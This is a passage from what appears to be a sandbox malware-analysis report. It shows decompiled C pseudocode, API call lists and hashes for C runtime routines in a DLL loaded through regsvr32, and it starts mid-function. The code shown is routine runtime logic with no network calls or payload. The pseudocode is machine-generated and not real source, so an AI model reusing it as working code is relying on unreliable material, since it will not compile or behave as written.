    													__eflags = _t206;
    													if(_t206 == 0) {
    														 *( *(_t229 + 4)) = _t300;
    														_t302 = 0;
    														_t77 = _t229 + 4;
    														 *_t77 =  *(_t229 + 4) + 4;
    														__eflags =  *_t77;
    													} else {
    														E6F84DC0E(_t300);
    														_t302 = _v12;
    													}
    													E6F84DC0E(0);
    													_t209 = _t302;
    													goto L37;
    												}
    											} else {
    												_push(_t285);
    												_t211 = E6F852161(_t300, _t225, _a4);
    												_t311 = _t310 + 0x10;
    												__eflags = _t211;
    												if(_t211 != 0) {
    													L45:
    													_push(0);
    													_push(0);
    													_push(0);
    													_push(0);
    													_push(0);
    													E6F84C27C();
    													asm("int3");
    													_push(_t306);
    													_t307 = _t311;
    													_t312 = _t311 - 0x298;
    													_t166 =  *0x6f85c024; // 0x17ad5049
    													_v124 = _t166 ^ _t307;
    													_t244 = _v108;
    													_t278 = _v104;
    													_push(_t225);
    													_push(0);
    													_t287 = _v112;
    													_v724 = _t278;
    													__eflags = _t244 - _t287;
    													if(_t244 != _t287) {
    														while(1) {
    															_t204 =  *_t244;
    															__eflags = _t204 - 0x2f;
    															if(_t204 == 0x2f) {
    																break;
    															}
    															__eflags = _t204 - 0x5c;
    															if(_t204 != 0x5c) {
    																__eflags = _t204 - 0x3a;
    																if(_t204 != 0x3a) {
    																	_t244 = E6F8521B0(_t287, _t244);
    																	__eflags = _t244 - _t287;
    																	if(_t244 != _t287) {
    																		continue;
    																	}
    																}
    															}
    															break;
    														}
    														_t278 = _v616;
    													}
    													_t168 =  *_t244;
    													_v609 = _t168;
    													__eflags = _t168 - 0x3a;
    													if(_t168 != 0x3a) {
    														L56:
    														_t226 = 0;
    														__eflags = _t168 - 0x2f;
    														if(__eflags == 0) {
    															L59:
    															_t169 = 1;
    														} else {
    															__eflags = _t168 - 0x5c;
    															if(__eflags == 0) {
    																goto L59;
    															} else {
    																__eflags = _t168 - 0x3a;
    																_t169 = 0;
    																if(__eflags == 0) {
    																	goto L59;
    																}
    															}
    														}
    														_v676 = _t226;
    														_v672 = _t226;
    														_push(_t300);
    														asm("sbb eax, eax");
    														_v668 = _t226;
    														_v664 = _t226;
    														_v644 =  ~(_t169 & 0x000000ff) & _t244 - _t287 + 0x00000001;
    														_v660 = _t226;
    														_v656 = _t226;
    														_t175 = E6F84EB7E(_t244 - _t287 + 1, _t287,  &_v676, E6F84F092(_t278, __eflags));
    														_t313 = _t312 + 0xc;
    														asm("sbb eax, eax");
    														_t179 = FindFirstFileExW( !( ~_t175) & _v668, _t226,  &_v608, _t226, _t226, _t226);
    														_t301 = _t179;
    														__eflags = _t301 - 0xffffffff;
    														if(_t301 != 0xffffffff) {
    															_t249 =  *((intOrPtr*)(_v616 + 4)) -  *_v616;
    															__eflags = _t249;
    															_v648 = _t249 >> 2;
    															do {
    																_v640 = _t226;
    																_v636 = _t226;
    																_v632 = _t226;
    																_v628 = _t226;
    																_v624 = _t226;
    																_v620 = _t226;
    																_t185 = E6F84EAAF( &(_v608.cFileName),  &_v640,  &_v609, E6F84F092(_t278, __eflags));
    																_t313 = _t313 + 0x10;
    																asm("sbb eax, eax");
    																_t188 =  !( ~_t185) & _v632;
    																__eflags =  *_t188 - 0x2e;
    																if( *_t188 != 0x2e) {
    																	L67:
    																	_push(_v616);
    																	_push(_v644);
    																	_push(_t287);
    																	_push(_t188);
    																	L33();
    																	_t313 = _t313 + 0x10;
    																	_v652 = _t188;
    																	__eflags = _t188;
    																	if(_t188 != 0) {
    																		__eflags = _v620 - _t226;
    																		if(_v620 != _t226) {
    																			E6F84DC0E(_v632);
    																			_t188 = _v652;
    																		}
    																		_t226 = _t188;
    																	} else {
    																		goto L68;
    																	}
    																} else {
    																	_t255 =  *((intOrPtr*)(_t188 + 1));
    																	__eflags = _t255;
    																	if(_t255 == 0) {
    																		goto L68;
    																	} else {
    																		__eflags = _t255 - 0x2e;
    																		if(_t255 != 0x2e) {
    																			goto L67;
    																		} else {
    																			__eflags =  *((intOrPtr*)(_t188 + 2)) - _t226;
    																			if( *((intOrPtr*)(_t188 + 2)) == _t226) {
    																				goto L68;
    																			} else {
    																				goto L67;
    																			}
    																		}
    																	}
    																}
    																L76:
    																FindClose(_t301);
    																goto L77;
    																L68:
    																__eflags = _v620 - _t226;
    																if(_v620 != _t226) {
    																	E6F84DC0E(_v632);
    																}
    																__eflags = FindNextFileW(_t301,  &_v608);
    															} while (__eflags != 0);
    															_t196 = _v616;
    															_t257 = _v648;
    															_t278 =  *_t196;
    															_t199 =  *((intOrPtr*)(_t196 + 4)) -  *_t196 >> 2;
    															__eflags = _t257 - _t199;
    															if(_t257 != _t199) {
    																E6F851BC0(_t278, _t278 + _t257 * 4, _t199 - _t257, 4, E6F84E9E5);
    															}
    															goto L76;
    														} else {
    															_push(_v616);
    															_push(_t226);
    															_push(_t226);
    															_push(_t287);
    															L33();
    															_t226 = _t179;
    														}
    														L77:
    														__eflags = _v656;
    														_pop(_t300);
    														if(_v656 != 0) {
    															E6F84DC0E(_v668);
    														}
    														_t190 = _t226;
    													} else {
    														_t190 = _t287 + 1;
    														__eflags = _t244 - _t287 + 1;
    														if(_t244 == _t287 + 1) {
    															_t168 = _v609;
    															goto L56;
    														} else {
    															_push(_t278);
    															_push(0);
    															_push(0);
    															_push(_t287);
    															L33();
    														}
    													}
    													_pop(_t288);
    													__eflags = _v16 ^ _t307;
    													_pop(_t227);
    													return E6F849ADF(_t190, _t227, _v16 ^ _t307, _t278, _t288, _t300);
    												} else {
    													goto L40;
    												}
    											}
    										} else {
    											_t209 = 0xc;
    											L37:
    											return _t209;
    										}
    									} else {
    										goto L23;
    									}
    									goto L81;
    									L23:
    									_t212 = _v12;
    									_t263 = _v16;
    									 *((intOrPtr*)(_v32 + _t212)) = _t263;
    									_t140 = _t212 + 4;
    									_t233 = _t263 + _v20;
    									_v16 = _t233;
    									_v12 = _t140;
    									__eflags = _t140 - _v40;
    								} while (_t140 != _v40);
    								goto L24;
    							}
    						} else {
    							_t297 = _t296 | 0xffffffff;
    							_v12 = _t297;
    							L25:
    							E6F84DC0E(_t222);
    							_pop(_t234);
    							goto L26;
    						}
    					} else {
    						while(1) {
    							_v8 = 0x3f2a;
    							_v6 = _t222;
    							_t217 = E6F852170(_t132,  &_v8);
    							_t234 =  *_t292;
    							__eflags = _t217;
    							if(_t217 != 0) {
    								_push( &(_v608.cAlternateFileName));
    								_push(_t217);
    								_push(_t234);
    								L46();
    								_t309 = _t309 + 0xc;
    								_v12 = _t217;
    								_t297 = _t217;
    							} else {
    								_t218 =  &(_v608.cAlternateFileName);
    								_push(_t218);
    								_push(_t222);
    								_push(_t222);
    								_push(_t234);
    								L33();
    								_t297 = _t218;
    								_t309 = _t309 + 0x10;
    								_v12 = _t297;
    							}
    							__eflags = _t297;
    							if(_t297 != 0) {
    								break;
    							}
    							_t292 =  &(_a4[1]);
    							_a4 = _t292;
    							_t132 =  *_t292;
    							__eflags = _t132;
    							if(_t132 != 0) {
    								continue;
    							} else {
    								_t283 = _v608.cAlternateFileName;
    								_t232 = _v40;
    								goto L9;
    							}
    							goto L81;
    						}
    						_t283 = _v608.cAlternateFileName;
    						L26:
    						_t272 = _t283;
    						_v32 = _t272;
    						__eflags = _v40 - _t272;
    						asm("sbb ecx, ecx");
    						_t236 =  !_t234 & _v40 - _t272 + 0x00000003 >> 0x00000002;
    						__eflags = _t236;
    						_v28 = _t236;
    						if(_t236 != 0) {
    							_t299 = _t236;
    							do {
    								E6F84DC0E( *_t283);
    								_t222 = _t222 + 1;
    								_t283 = _t283 + 4;
    								__eflags = _t222 - _t299;
    							} while (_t222 != _t299);
    							_t283 = _v608.cAlternateFileName;
    							_t297 = _v12;
    						}
    						E6F84DC0E(_t283);
    						goto L31;
    					}
    				} else {
    					_t219 = E6F84D46D(_t317);
    					_t297 = 0x16;
    					 *_t219 = _t297;
    					E6F84C24F();
    					L31:
    					return _t297;
    				}
    				L81:
    			}

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000026.00000002.798203237.000000006F841000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F840000, based on PE: true
    • Associated: 00000026.00000002.798195732.000000006F840000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000026.00000002.798217144.000000006F855000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000026.00000002.798226864.000000006F85C000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000026.00000002.798233382.000000006F85E000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_38_2_6f840000_regsvr32.jbxd
    Similarity
    • API ID: _free
    • String ID: *?
    • API String ID: 269201875-2564092906
    • Opcode ID: 939c668b89eb78b1771427d9910a47cc5a2598c9164f03a6bbd27ebda0841c17
    • Instruction ID: ce80aed3a36301e9cf729f369e529116734edfc53bad36637121c0f37f0ed749
    • Opcode Fuzzy Hash: 939c668b89eb78b1771427d9910a47cc5a2598c9164f03a6bbd27ebda0841c17
    • Instruction Fuzzy Hash: F1611B75D0021DAFDB15CFACC8809EEFBF5EF48314B1485AAD855EB340E775AA418B90
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 67%
    			E6F84AE74(void* __ebx, void* __edi, void* __esi, void* __eflags) {
    				signed int* _t52;
    				signed int _t53;
    				intOrPtr _t54;
    				signed int _t58;
    				signed int _t61;
    				intOrPtr _t71;
    				signed int _t75;
    				signed int _t79;
    				signed int _t81;
    				signed int _t84;
    				signed int _t85;
    				signed int _t97;
    				signed int* _t98;
    				signed char* _t101;
    				signed int _t107;
    				void* _t111;
    
    				_push(0x10);
    				_push(0x6f85a770);
    				E6F849960(__ebx, __edi, __esi);
    				_t75 = 0;
    				_t52 =  *(_t111 + 0x10);
    				_t81 = _t52[1];
    				if(_t81 == 0 ||  *((intOrPtr*)(_t81 + 8)) == 0) {
    					L30:
    					_t53 = 0;
    					__eflags = 0;
    					goto L31;
    				} else {
    					_t97 = _t52[2];
    					if(_t97 != 0 ||  *_t52 < 0) {
    						_t84 =  *_t52;
    						_t107 =  *(_t111 + 0xc);
    						if(_t84 >= 0) {
    							_t107 = _t107 + 0xc + _t97;
    						}
    						 *(_t111 - 4) = _t75;
    						_t101 =  *(_t111 + 0x14);
    						if(_t84 >= 0 || ( *_t101 & 0x00000010) == 0) {
    							L10:
    							_t54 =  *((intOrPtr*)(_t111 + 8));
    							__eflags = _t84 & 0x00000008;
    							if((_t84 & 0x00000008) == 0) {
    								__eflags =  *_t101 & 0x00000001;
    								if(( *_t101 & 0x00000001) == 0) {
    									_t84 =  *(_t54 + 0x18);
    									__eflags = _t101[0x18] - _t75;
    									if(_t101[0x18] != _t75) {
    										__eflags = _t84;
    										if(_t84 == 0) {
    											goto L32;
    										} else {
    											__eflags = _t107;
    											if(_t107 == 0) {
    												goto L32;
    											} else {
    												__eflags =  *_t101 & 0x00000004;
    												_t79 = 0;
    												_t75 = (_t79 & 0xffffff00 | ( *_t101 & 0x00000004) != 0x00000000) + 1;
    												__eflags = _t75;
    												 *(_t111 - 0x20) = _t75;
    												goto L29;
    											}
    										}
    									} else {
    										__eflags = _t84;
    										if(_t84 == 0) {
    											goto L32;
    										} else {
    											__eflags = _t107;
    											if(_t107 == 0) {
    												goto L32;
    											} else {
    												E6F849DB0(_t107, E6F84AC5A(_t84,  &(_t101[8])), _t101[0x14]);
    												goto L29;
    											}
    										}
    									}
    								} else {
    									__eflags =  *(_t54 + 0x18);
    									if( *(_t54 + 0x18) == 0) {
    										goto L32;
    									} else {
    										__eflags = _t107;
    										if(_t107 == 0) {
    											goto L32;
    										} else {
    											E6F849DB0(_t107,  *(_t54 + 0x18), _t101[0x14]);
    											__eflags = _t101[0x14] - 4;
    											if(_t101[0x14] == 4) {
    												__eflags =  *_t107;
    												if( *_t107 != 0) {
    													_push( &(_t101[8]));
    													_push( *_t107);
    													goto L21;
    												}
    											}
    											goto L29;
    										}
    									}
    								}
    							} else {
    								_t84 =  *(_t54 + 0x18);
    								goto L12;
    							}
    						} else {
    							_t71 =  *0x6f85d368; // 0x0
    							 *((intOrPtr*)(_t111 - 0x1c)) = _t71;
    							if(_t71 == 0) {
    								goto L10;
    							} else {
    								 *0x6f8551b8();
    								_t84 =  *((intOrPtr*)(_t111 - 0x1c))();
    								L12:
    								if(_t84 == 0 || _t107 == 0) {
    									L32:
    									E6F84D547(_t75, _t84, _t97, _t101, _t107);
    									asm("int3");
    									_push(8);
    									_push(0x6f85a790);
    									E6F849960(_t75, _t101, _t107);
    									_t98 =  *(_t111 + 0x10);
    									_t85 =  *(_t111 + 0xc);
    									__eflags =  *_t98;
    									if(__eflags >= 0) {
    										_t103 = _t85 + 0xc + _t98[2];
    										__eflags = _t85 + 0xc + _t98[2];
    									} else {
    										_t103 = _t85;
    									}
    									 *(_t111 - 4) =  *(_t111 - 4) & 0x00000000;
    									_t108 =  *(_t111 + 0x14);
    									_push( *(_t111 + 0x14));
    									_push(_t98);
    									_push(_t85);
    									_t77 =  *((intOrPtr*)(_t111 + 8));
    									_push( *((intOrPtr*)(_t111 + 8)));
    									_t58 = E6F84AE74(_t77, _t103, _t108, __eflags) - 1;
    									__eflags = _t58;
    									if(_t58 == 0) {
    										_t61 = E6F84BB74(_t103, _t108[0x18], E6F84AC5A( *((intOrPtr*)(_t77 + 0x18)),  &(_t108[8])));
    									} else {
    										_t61 = _t58 - 1;
    										__eflags = _t61;
    										if(_t61 == 0) {
    											_t61 = E6F84BB84(_t103, _t108[0x18], E6F84AC5A( *((intOrPtr*)(_t77 + 0x18)),  &(_t108[8])), 1);
    										}
    									}
    									 *(_t111 - 4) = 0xfffffffe;
    									 *[fs:0x0] =  *((intOrPtr*)(_t111 - 0x10));
    									return _t61;
    								} else {
    									 *_t107 = _t84;
    									_push( &(_t101[8]));
    									_push(_t84);
    									L21:
    									 *_t107 = E6F84AC5A();
    									L29:
    									 *(_t111 - 4) = 0xfffffffe;
    									_t53 = _t75;
    									L31:
    									 *[fs:0x0] =  *((intOrPtr*)(_t111 - 0x10));
    									return _t53;
    								}
    							}
    						}
    					} else {
    						goto L30;
    					}
    				}
    			}

    APIs
    Memory Dump Source
    • Source File: 00000026.00000002.798203237.000000006F841000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F840000, based on PE: true
    • Associated: 00000026.00000002.798195732.000000006F840000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000026.00000002.798217144.000000006F855000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000026.00000002.798226864.000000006F85C000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000026.00000002.798233382.000000006F85E000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_38_2_6f840000_regsvr32.jbxd
    Similarity
    • API ID: AdjustPointer
    • String ID:
    • API String ID: 1740715915-0
    • Opcode ID: 9860f5dcd618b7c2425c20db10d824ca8c9613cb352f3be2da5243dae549f9d9
    • Instruction ID: cfecd7e5fbd8aed3a688b55f3065a13c9929405280a0a97cb44e81a9964fa42f
    • Opcode Fuzzy Hash: 9860f5dcd618b7c2425c20db10d824ca8c9613cb352f3be2da5243dae549f9d9
    • Instruction Fuzzy Hash: 1D518CB260570EAFEB198F58C940BAAB7A5FF44314F104DBEE8255E2D0E731E891C790
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E6F84EAAF(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a16) {
    				intOrPtr _t16;
    				intOrPtr _t17;
    				intOrPtr _t19;
    				intOrPtr _t29;
    				char _t31;
    				intOrPtr _t38;
    				intOrPtr* _t40;
    				intOrPtr _t41;
    
    				_t40 = _a4;
    				if(_t40 != 0) {
    					_t31 = 0;
    					__eflags =  *_t40;
    					if( *_t40 != 0) {
    						_t16 = E6F84FCA5(_a16, 0, _t40, 0xffffffff, 0, 0, 0, 0);
    						__eflags = _t16;
    						if(__eflags != 0) {
    							_t38 = _a8;
    							__eflags = _t16 -  *((intOrPtr*)(_t38 + 0xc));
    							if(__eflags <= 0) {
    								L11:
    								_t17 = E6F84FCA5(_a16, _t31, _t40, 0xffffffff,  *((intOrPtr*)(_t38 + 8)),  *((intOrPtr*)(_t38 + 0xc)), _t31, _t31);
    								__eflags = _t17;
    								if(__eflags != 0) {
    									 *((intOrPtr*)(_t38 + 0x10)) = _t17 - 1;
    									_t19 = 0;
    									__eflags = 0;
    								} else {
    									E6F84D437(GetLastError());
    									_t19 =  *((intOrPtr*)(E6F84D46D(__eflags)));
    								}
    								L14:
    								return _t19;
    							}
    							_t19 = E6F84F0EB(_t38, __eflags, _t16);
    							__eflags = _t19;
    							if(_t19 != 0) {
    								goto L14;
    							}
    							goto L11;
    						}
    						E6F84D437(GetLastError());
    						return  *((intOrPtr*)(E6F84D46D(__eflags)));
    					}
    					_t41 = _a8;
    					__eflags =  *((intOrPtr*)(_t41 + 0xc));
    					if(__eflags != 0) {
    						L6:
    						 *((char*)( *((intOrPtr*)(_t41 + 8)))) = _t31;
    						L2:
    						 *((intOrPtr*)(_t41 + 0x10)) = _t31;
    						return 0;
    					}
    					_t29 = E6F84F0EB(_t41, __eflags, 1);
    					__eflags = _t29;
    					if(_t29 != 0) {
    						return _t29;
    					}
    					goto L6;
    				}
    				_t41 = _a8;
    				E6F84F0D1(_t41);
    				_t31 = 0;
    				 *((intOrPtr*)(_t41 + 8)) = 0;
    				 *((intOrPtr*)(_t41 + 0xc)) = 0;
    				goto L2;
    			}

    APIs
      • Part of subcall function 6F84F0D1: _free.LIBCMT ref: 6F84F0DF
      • Part of subcall function 6F84FCA5: WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,00000001,6F84E286,6F8512A9,0000FDE9,00000000,?,?,?,6F851022,0000FDE9,00000000,?), ref: 6F84FD51
    • GetLastError.KERNEL32 ref: 6F84EB17
    • __dosmaperr.LIBCMT ref: 6F84EB1E
    • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 6F84EB5D
    • __dosmaperr.LIBCMT ref: 6F84EB64
    Memory Dump Source
    • Source File: 00000026.00000002.798203237.000000006F841000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F840000, based on PE: true
    • Associated: 00000026.00000002.798195732.000000006F840000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000026.00000002.798217144.000000006F855000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000026.00000002.798226864.000000006F85C000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000026.00000002.798233382.000000006F85E000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_38_2_6f840000_regsvr32.jbxd
    Similarity
    • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
    • String ID:
    • API String ID: 167067550-0
    • Opcode ID: 5eff3fe3cdce836c4c1b059b5e975b55c8ef6872f1de88f75431d983273b5bbf
    • Instruction ID: d4cf3afde8c7f4fca5df4cb73e49596384e796fd48f37a7ba1d9c719aa034f74
    • Opcode Fuzzy Hash: 5eff3fe3cdce836c4c1b059b5e975b55c8ef6872f1de88f75431d983273b5bbf
    • Instruction Fuzzy Hash: 8121927160471DBFEB10CFA98880957B7A9EF113687008D99E866AF990D730FC5087A0
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 76%
    			E6F84D9BC(void* __ecx, void* __edx) {
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				intOrPtr _t2;
    				long _t3;
    				intOrPtr _t5;
    				long _t6;
    				intOrPtr _t9;
    				long _t10;
    				signed int _t12;
    				signed int _t39;
    				signed int _t40;
    				void* _t43;
    				void* _t49;
    				signed int _t51;
    				signed int _t53;
    				signed int _t54;
    				long _t56;
    				long _t60;
    				long _t61;
    				void* _t65;
    
    				_t49 = __edx;
    				_t43 = __ecx;
    				_t60 = GetLastError();
    				_t2 =  *0x6f85c110; // 0x7
    				_t67 = _t2 - 0xffffffff;
    				if(_t2 == 0xffffffff) {
    					L6:
    					_t3 = E6F84DF59(__eflags, _t2, 0xffffffff);
    					__eflags = _t3;
    					if(_t3 == 0) {
    						goto L3;
    					} else {
    						_t51 = E6F84DC48(1, 0x364);
    						_pop(_t43);
    						__eflags = _t51;
    						if(__eflags != 0) {
    							__eflags = E6F84DF59(__eflags,  *0x6f85c110, _t51);
    							if(__eflags != 0) {
    								E6F84D7BE(_t51, 0x6f85d850);
    								E6F84DC0E(0);
    								_t65 = _t65 + 0xc;
    								goto L13;
    							} else {
    								_t39 = 0;
    								E6F84DF59(__eflags,  *0x6f85c110, 0);
    								_push(_t51);
    								goto L9;
    							}
    						} else {
    							_t39 = 0;
    							__eflags = 0;
    							E6F84DF59(0,  *0x6f85c110, 0);
    							_push(0);
    							L9:
    							E6F84DC0E();
    							_pop(_t43);
    							goto L4;
    						}
    					}
    				} else {
    					_t51 = E6F84DF1A(_t67, _t2);
    					if(_t51 == 0) {
    						_t2 =  *0x6f85c110; // 0x7
    						goto L6;
    					} else {
    						if(_t51 != 0xffffffff) {
    							L13:
    							_t39 = _t51;
    						} else {
    							L3:
    							_t39 = 0;
    							L4:
    							_t51 = _t39;
    						}
    					}
    				}
    				SetLastError(_t60);
    				asm("sbb edi, edi");
    				_t53 =  ~_t51 & _t39;
    				if(_t53 == 0) {
    					E6F84D547(_t39, _t43, _t49, _t53, _t60);
    					asm("int3");
    					_t5 =  *0x6f85c110; // 0x7
    					_push(_t60);
    					__eflags = _t5 - 0xffffffff;
    					if(__eflags == 0) {
    						L22:
    						_t6 = E6F84DF59(__eflags, _t5, 0xffffffff);
    						__eflags = _t6;
    						if(_t6 == 0) {
    							goto L31;
    						} else {
    							_t60 = E6F84DC48(1, 0x364);
    							_pop(_t43);
    							__eflags = _t60;
    							if(__eflags != 0) {
    								__eflags = E6F84DF59(__eflags,  *0x6f85c110, _t60);
    								if(__eflags != 0) {
    									E6F84D7BE(_t60, 0x6f85d850);
    									E6F84DC0E(0);
    									_t65 = _t65 + 0xc;
    									goto L29;
    								} else {
    									E6F84DF59(__eflags,  *0x6f85c110, _t21);
    									_push(_t60);
    									goto L25;
    								}
    							} else {
    								E6F84DF59(__eflags,  *0x6f85c110, _t20);
    								_push(_t60);
    								L25:
    								E6F84DC0E();
    								_pop(_t43);
    								goto L31;
    							}
    						}
    					} else {
    						_t60 = E6F84DF1A(__eflags, _t5);
    						__eflags = _t60;
    						if(__eflags == 0) {
    							_t5 =  *0x6f85c110; // 0x7
    							goto L22;
    						} else {
    							__eflags = _t60 - 0xffffffff;
    							if(_t60 == 0xffffffff) {
    								L31:
    								E6F84D547(_t39, _t43, _t49, _t53, _t60);
    								asm("int3");
    								_push(_t39);
    								_push(_t60);
    								_push(_t53);
    								_t61 = GetLastError();
    								_t9 =  *0x6f85c110; // 0x7
    								__eflags = _t9 - 0xffffffff;
    								if(__eflags == 0) {
    									L38:
    									_t10 = E6F84DF59(__eflags, _t9, 0xffffffff);
    									__eflags = _t10;
    									if(_t10 == 0) {
    										goto L35;
    									} else {
    										_t12 = E6F84DC48(1, 0x364); // executed
    										_t54 = _t12;
    										__eflags = _t54;
    										if(__eflags != 0) {
    											__eflags = E6F84DF59(__eflags,  *0x6f85c110, _t54);
    											if(__eflags != 0) {
    												E6F84D7BE(_t54, 0x6f85d850);
    												E6F84DC0E(0);
    												goto L45;
    											} else {
    												_t40 = 0;
    												E6F84DF59(__eflags,  *0x6f85c110, 0);
    												_push(_t54);
    												goto L41;
    											}
    										} else {
    											_t40 = 0;
    											__eflags = 0;
    											E6F84DF59(0,  *0x6f85c110, 0);
    											_push(0);
    											L41:
    											E6F84DC0E();
    											goto L36;
    										}
    									}
    								} else {
    									_t54 = E6F84DF1A(__eflags, _t9);
    									__eflags = _t54;
    									if(__eflags == 0) {
    										_t9 =  *0x6f85c110; // 0x7
    										goto L38;
    									} else {
    										__eflags = _t54 - 0xffffffff;
    										if(_t54 != 0xffffffff) {
    											L45:
    											_t40 = _t54;
    										} else {
    											L35:
    											_t40 = 0;
    											__eflags = 0;
    											L36:
    											_t54 = _t40;
    										}
    									}
    								}
    								SetLastError(_t61);
    								asm("sbb edi, edi");
    								_t56 =  ~_t54 & _t40;
    								__eflags = _t56;
    								return _t56;
    							} else {
    								L29:
    								__eflags = _t60;
    								if(_t60 == 0) {
    									goto L31;
    								} else {
    									return _t60;
    								}
    							}
    						}
    					}
    				} else {
    					return _t53;
    				}
    			}

    APIs
    • GetLastError.KERNEL32(?,?,?,6F850D69,?,00000001,6F84E2F7,?,6F851223,00000001,?,?,?,6F84E286,?,00000000), ref: 6F84D9C1
    • _free.LIBCMT ref: 6F84DA1E
    • _free.LIBCMT ref: 6F84DA54
    • SetLastError.KERNEL32(00000000,00000007,000000FF,?,6F851223,00000001,?,?,?,6F84E286,?,00000000,00000000,6F85A968,0000002C,6F84E2F7), ref: 6F84DA5F
    Memory Dump Source
    • Source File: 00000026.00000002.798203237.000000006F841000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F840000, based on PE: true
    • Associated: 00000026.00000002.798195732.000000006F840000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000026.00000002.798217144.000000006F855000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000026.00000002.798226864.000000006F85C000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000026.00000002.798233382.000000006F85E000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_38_2_6f840000_regsvr32.jbxd
    Similarity
    • API ID: ErrorLast_free
    • String ID:
    • API String ID: 2283115069-0
    • Opcode ID: 568b7a6a15ccd1c3670b23fe9a3986c6d6958096eeb56c6ac8758ce6bcc8a009
    • Instruction ID: 7a15a007bec5e4c79f8d7c6658db5d88f18fcdea29e23218162d7c15600073f9
    • Opcode Fuzzy Hash: 568b7a6a15ccd1c3670b23fe9a3986c6d6958096eeb56c6ac8758ce6bcc8a009
    • Instruction Fuzzy Hash: 5A11E03364870D7B9B55867C4C86A2A269B9BC33BC7200EE5F538DE2C1DF69CC25C5A0
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E6F852BEE(void* _a4, long _a8, DWORD* _a12) {
    				void* _t13;
    
    				_t13 = WriteConsoleW( *0x6f85c860, _a4, _a8, _a12, 0);
    				if(_t13 == 0 && GetLastError() == 6) {
    					E6F852BD7();
    					E6F852B99();
    					_t13 = WriteConsoleW( *0x6f85c860, _a4, _a8, _a12, _t13);
    				}
    				return _t13;
    			}

    APIs
    • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,6F85278A,?,00000001,?,00000001,?,6F850CF8,?,?,00000001), ref: 6F852C05
    • GetLastError.KERNEL32(?,6F85278A,?,00000001,?,00000001,?,6F850CF8,?,?,00000001,?,00000001,?,6F851244,6F84E286), ref: 6F852C11
      • Part of subcall function 6F852BD7: CloseHandle.KERNEL32(FFFFFFFE,6F852C21,?,6F85278A,?,00000001,?,00000001,?,6F850CF8,?,?,00000001,?,00000001), ref: 6F852BE7
    • ___initconout.LIBCMT ref: 6F852C21
      • Part of subcall function 6F852B99: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6F852BC8,6F852777,00000001,?,6F850CF8,?,?,00000001,?), ref: 6F852BAC
    • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,6F85278A,?,00000001,?,00000001,?,6F850CF8,?,?,00000001,?), ref: 6F852C36
    Memory Dump Source
    • Source File: 00000026.00000002.798203237.000000006F841000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F840000, based on PE: true
    • Associated: 00000026.00000002.798195732.000000006F840000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000026.00000002.798217144.000000006F855000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000026.00000002.798226864.000000006F85C000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000026.00000002.798233382.000000006F85E000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_38_2_6f840000_regsvr32.jbxd
    Similarity
    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
    • String ID:
    • API String ID: 2744216297-0
    • Opcode ID: 3c6cb79b9cdb48a9429b71476b99fb8f8672edfa90eb0b72fe14f07a2adab0cc
    • Instruction ID: b469e2616976a60d9de8277409ce9848ed0e5d3ab303db6be9c6b75be55c7c7c
    • Opcode Fuzzy Hash: 3c6cb79b9cdb48a9429b71476b99fb8f8672edfa90eb0b72fe14f07a2adab0cc
    • Instruction Fuzzy Hash: 5BF01C36100618BBCF921FA9CC089893F66FF0B7B5B004490FA189D160CB369870EBD5
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E6F84D260() {
    
    				E6F84DC0E( *0x6f85d844);
    				 *0x6f85d844 = 0;
    				E6F84DC0E( *0x6f85d848);
    				 *0x6f85d848 = 0;
    				E6F84DC0E( *0x6f85d9c8);
    				 *0x6f85d9c8 = 0;
    				E6F84DC0E( *0x6f85d9cc);
    				 *0x6f85d9cc = 0;
    				return 1;
    			}

    APIs
    • _free.LIBCMT ref: 6F84D269
      • Part of subcall function 6F84DC0E: RtlFreeHeap.NTDLL(00000000,00000000,?,6F85199E,?,00000000,?,?,?,6F8519C5,?,00000007,?,?,6F8504FE,?), ref: 6F84DC24
      • Part of subcall function 6F84DC0E: GetLastError.KERNEL32(?,?,6F85199E,?,00000000,?,?,?,6F8519C5,?,00000007,?,?,6F8504FE,?,?), ref: 6F84DC36
    • _free.LIBCMT ref: 6F84D27C
    • _free.LIBCMT ref: 6F84D28D
    • _free.LIBCMT ref: 6F84D29E
    Memory Dump Source
